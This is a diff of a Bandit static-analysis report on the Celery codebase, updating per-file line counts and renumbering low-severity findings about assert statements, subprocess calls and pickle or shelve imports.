"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 74,
+ "loc": 79,
"nosec": 0
},
"celery/backends/cosmosdbsql.py": {
@@ -419,7 +407,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 85,
+ "loc": 79,
"nosec": 0
},
"celery/backends/couchdb.py": {
@@ -431,7 +419,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 77,
"nosec": 0
},
"celery/backends/database/__init__.py": {
@@ -467,7 +455,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 47,
+ "loc": 68,
"nosec": 0
},
"celery/backends/dynamodb.py": {
@@ -503,7 +491,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 89,
"nosec": 0
},
"celery/backends/mongodb.py": {
@@ -515,7 +503,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 241,
+ "loc": 243,
"nosec": 0
},
"celery/backends/redis.py": {
@@ -527,19 +515,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 448,
- "nosec": 0
- },
- "celery/backends/riak.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 105,
+ "loc": 499,
"nosec": 0
},
"celery/backends/rpc.py": {
@@ -563,19 +539,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 65,
+ "loc": 66,
"nosec": 0
},
"celery/beat.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 553,
+ "loc": 567,
"nosec": 0
},
"celery/bin/__init__.py": {
@@ -599,7 +575,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 268,
+ "loc": 274,
"nosec": 0
},
"celery/bin/base.py": {
@@ -611,7 +587,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 180,
+ "loc": 219,
"nosec": 0
},
"celery/bin/beat.py": {
@@ -623,7 +599,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 58,
+ "loc": 63,
"nosec": 0
},
"celery/bin/call.py": {
@@ -635,7 +611,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 66,
+ "loc": 69,
"nosec": 0
},
"celery/bin/celery.py": {
@@ -647,7 +623,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 127,
+ "loc": 176,
"nosec": 0
},
"celery/bin/control.py": {
@@ -659,7 +635,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 164,
+ "loc": 181,
"nosec": 0
},
"celery/bin/events.py": {
@@ -671,7 +647,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 79,
"nosec": 0
},
"celery/bin/graph.py": {
@@ -683,7 +659,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 157,
+ "loc": 162,
"nosec": 0
},
"celery/bin/list.py": {
@@ -695,7 +671,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 25,
+ "loc": 28,
"nosec": 0
},
"celery/bin/logtool.py": {
@@ -707,7 +683,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 125,
"nosec": 0
},
"celery/bin/migrate.py": {
@@ -719,7 +695,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 54,
+ "loc": 57,
"nosec": 0
},
"celery/bin/multi.py": {
@@ -731,7 +707,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 372,
+ "loc": 375,
"nosec": 0
},
"celery/bin/purge.py": {
@@ -743,7 +719,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 55,
+ "loc": 60,
"nosec": 0
},
"celery/bin/result.py": {
@@ -755,7 +731,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 22,
+ "loc": 25,
"nosec": 0
},
"celery/bin/shell.py": {
@@ -767,7 +743,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 143,
+ "loc": 144,
"nosec": 0
},
"celery/bin/upgrade.py": {
@@ -779,7 +755,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 69,
+ "loc": 74,
"nosec": 0
},
"celery/bin/worker.py": {
@@ -791,7 +767,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 306,
"nosec": 0
},
"celery/bootsteps.py": {
@@ -815,7 +791,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 1113,
+ "loc": 1143,
"nosec": 0
},
"celery/concurrency/__init__.py": {
@@ -827,7 +803,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 19,
+ "loc": 22,
"nosec": 0
},
"celery/concurrency/asynpool.py": {
@@ -863,7 +839,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 114,
+ "loc": 145,
"nosec": 0
},
"celery/concurrency/gevent.py": {
@@ -887,7 +863,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 131,
+ "loc": 132,
"nosec": 0
},
"celery/concurrency/solo.py": {
@@ -911,7 +887,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 33,
+ "loc": 30,
"nosec": 0
},
"celery/contrib/__init__.py": {
@@ -959,7 +935,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 146,
+ "loc": 153,
"nosec": 0
},
"celery/contrib/rdb.py": {
@@ -1019,7 +995,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 175,
+ "loc": 176,
"nosec": 0
},
"celery/contrib/testing/mocks.py": {
@@ -1055,7 +1031,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 130,
+ "loc": 141,
"nosec": 0
},
"celery/events/__init__.py": {
@@ -1139,7 +1115,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 87,
+ "loc": 88,
"nosec": 0
},
"celery/events/state.py": {
@@ -1151,7 +1127,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 569,
+ "loc": 570,
"nosec": 0
},
"celery/exceptions.py": {
@@ -1163,19 +1139,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 186,
- "nosec": 0
- },
- "celery/five.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 4,
+ "loc": 196,
"nosec": 0
},
"celery/fixups/__init__.py": {
@@ -1235,7 +1199,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 202,
+ "loc": 204,
"nosec": 0
},
"celery/loaders/default.py": {
@@ -1259,7 +1223,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 426,
+ "loc": 404,
"nosec": 0
},
"celery/platforms.py": {
@@ -1271,7 +1235,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 623,
+ "loc": 631,
"nosec": 0
},
"celery/result.py": {
@@ -1283,7 +1247,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 866,
+ "loc": 843,
"nosec": 0
},
"celery/schedules.py": {
@@ -1382,30 +1346,6 @@
"loc": 95,
"nosec": 0
},
- "celery/task/__init__.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 39,
- "nosec": 0
- },
- "celery/task/base.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 184,
- "nosec": 0
- },
"celery/utils/__init__.py": {
"CONFIDENCE.HIGH": 0.0,
"CONFIDENCE.LOW": 0.0,
@@ -1439,7 +1379,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 611,
+ "loc": 595,
"nosec": 0
},
"celery/utils/debug.py": {
@@ -1490,18 +1430,6 @@
"loc": 262,
"nosec": 0
},
- "celery/utils/encoding.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 5,
- "nosec": 0
- },
"celery/utils/functional.py": {
"CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
@@ -1511,7 +1439,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 261,
+ "loc": 290,
"nosec": 0
},
"celery/utils/graph.py": {
@@ -1535,7 +1463,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 115,
"nosec": 0
},
"celery/utils/iso8601.py": {
@@ -1559,7 +1487,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 215,
"nosec": 0
},
"celery/utils/nodenames.py": {
@@ -1595,7 +1523,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 188,
+ "loc": 190,
"nosec": 0
},
"celery/utils/serialization.py": {
@@ -1607,7 +1535,7 @@
"SEVERITY.LOW": 4.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 209,
"nosec": 0
},
"celery/utils/static/__init__.py": {
@@ -1655,7 +1583,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 135,
+ "loc": 136,
"nosec": 0
},
"celery/utils/threads.py": {
@@ -1775,7 +1703,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 470,
+ "loc": 493,
"nosec": 0
},
"celery/worker/consumer/control.py": {
@@ -1859,7 +1787,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 423,
+ "loc": 424,
"nosec": 0
},
"celery/worker/heartbeat.py": {
@@ -1883,7 +1811,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 79,
+ "loc": 92,
"nosec": 0
},
"celery/worker/pidbox.py": {
@@ -1907,19 +1835,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 536,
+ "loc": 578,
"nosec": 0
},
"celery/worker/state.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 200,
+ "loc": 208,
"nosec": 0
},
"celery/worker/strategy.py": {
@@ -1931,7 +1859,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 166,
+ "loc": 175,
"nosec": 0
},
"celery/worker/worker.py": {
@@ -1963,353 +1891,369 @@
"test_name": "blacklist"
},
{
- "code": "196 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n197 pipe = Popen(argstr, env=env)\n198 return self.handle_process_exit(\n",
+ "code": "216 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n217 pipe = Popen(argstr, env=env)\n218 return self.handle_process_exit(\n",
"filename": "celery/apps/multi.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "subprocess call - check for execution of untrusted input.",
- "line_number": 197,
+ "line_number": 217,
"line_range": [
- 197
+ 217
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b603_subprocess_without_shell_equals_true.html",
"test_id": "B603",
"test_name": "subprocess_without_shell_equals_true"
},
{
- "code": "322 ])\n323 os.execv(sys.executable, [sys.executable] + sys.argv)\n324 \n",
+ "code": "341 ])\n342 os.execv(sys.executable, [sys.executable] + sys.argv)\n343 \n",
"filename": "celery/apps/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 323,
+ "line_number": 342,
"line_range": [
- 323
+ 342
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "74 self.set(key, b'test value')\n75 assert self.get(key) == b'test value'\n76 self.delete(key)\n",
+ "code": "72 self.set(key, b'test value')\n73 assert self.get(key) == b'test value'\n74 self.delete(key)\n",
"filename": "celery/backends/filesystem.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 75,
+ "line_number": 73,
"line_range": [
- 75
+ 73
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "89 path = executable\n90 os.execv(path, [path] + argv)\n91 except Exception: # pylint: disable=broad-except\n",
+ "code": "6 import os\n7 import shelve\n8 import sys\n",
+ "filename": "celery/beat.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 7,
+ "line_range": [
+ 7
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
+ },
+ {
+ "code": "124 path = executable\n125 os.execv(path, [path] + argv)\n126 return EX_OK\n",
"filename": "celery/bin/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 90,
+ "line_number": 125,
"line_range": [
- 90
+ 125
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "23 from numbers import Integral\n24 from pickle import HIGHEST_PROTOCOL\n25 from time import sleep\n",
+ "code": "22 from numbers import Integral\n23 from pickle import HIGHEST_PROTOCOL\n24 from struct import pack, unpack, unpack_from\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with HIGHEST_PROTOCOL module.",
- "line_number": 24,
+ "line_number": 23,
"line_range": [
- 24
+ 23
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "613 proc in waiting_to_start):\n614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n",
+ "code": "607 proc in waiting_to_start):\n608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 614,
+ "line_number": 608,
"line_range": [
- 614
+ 608
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n",
+ "code": "608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 615,
+ "line_number": 609,
"line_range": [
- 615
+ 609
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n617 error('Timed out waiting for UP message from %r', proc)\n",
+ "code": "609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n611 error('Timed out waiting for UP message from %r', proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 616,
+ "line_number": 610,
"line_range": [
- 616
+ 610
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "636 \n637 assert not isblocking(proc.outq._reader)\n638 \n639 # handle_result_event is called when the processes outqueue is\n640 # readable.\n641 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
+ "code": "630 \n631 assert not isblocking(proc.outq._reader)\n632 \n633 # handle_result_event is called when the processes outqueue is\n634 # readable.\n635 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 637,
+ "line_number": 631,
"line_range": [
- 637,
- 638,
- 639,
- 640
+ 631,
+ 632,
+ 633,
+ 634
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1090 synq = None\n1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n",
+ "code": "1088 synq = None\n1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1091,
+ "line_number": 1089,
"line_range": [
- 1091
+ 1089
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n",
+ "code": "1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1092,
+ "line_number": 1090,
"line_range": [
- 1092
+ 1090
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n",
+ "code": "1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1093,
+ "line_number": 1091,
"line_range": [
- 1093
+ 1091
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n1095 if self.synack:\n",
+ "code": "1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n1093 if self.synack:\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1094,
+ "line_number": 1092,
"line_range": [
- 1094
+ 1092
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1096 synq = _SimpleQueue(wnonblock=True)\n1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n",
+ "code": "1094 synq = _SimpleQueue(wnonblock=True)\n1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1097,
+ "line_number": 1095,
"line_range": [
- 1097
+ 1095
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n1099 return inq, outq, synq\n",
+ "code": "1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n1097 return inq, outq, synq\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1098,
+ "line_number": 1096,
"line_range": [
- 1098
+ 1096
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1109 return logger.warning('process with pid=%s already exited', pid)\n1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n",
+ "code": "1107 return logger.warning('process with pid=%s already exited', pid)\n1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1110,
+ "line_number": 1108,
"line_range": [
- 1110
+ 1108
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n1112 self._waiting_to_start.discard(proc)\n",
+ "code": "1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n1110 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1111,
+ "line_number": 1109,
"line_range": [
- 1111
+ 1109
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1189 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1190 assert queues in self._queues\n1191 b = len(self._queues)\n",
+ "code": "1187 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1188 assert queues in self._queues\n1189 b = len(self._queues)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1190,
+ "line_number": 1188,
"line_range": [
- 1190
+ 1188
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1192 self._queues[queues] = proc\n1193 assert b == len(self._queues)\n1194 \n",
+ "code": "1190 self._queues[queues] = proc\n1191 assert b == len(self._queues)\n1192 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1193,
+ "line_number": 1191,
"line_range": [
- 1193
+ 1191
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1272 pass\n1273 assert len(self._queues) == before\n1274 \n",
+ "code": "1270 pass\n1271 assert len(self._queues) == before\n1272 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1273,
+ "line_number": 1271,
"line_range": [
- 1273
+ 1271
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1279 \"\"\"\n1280 assert not proc._is_alive()\n1281 self._waiting_to_start.discard(proc)\n",
+ "code": "1277 \"\"\"\n1278 assert not proc._is_alive()\n1279 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
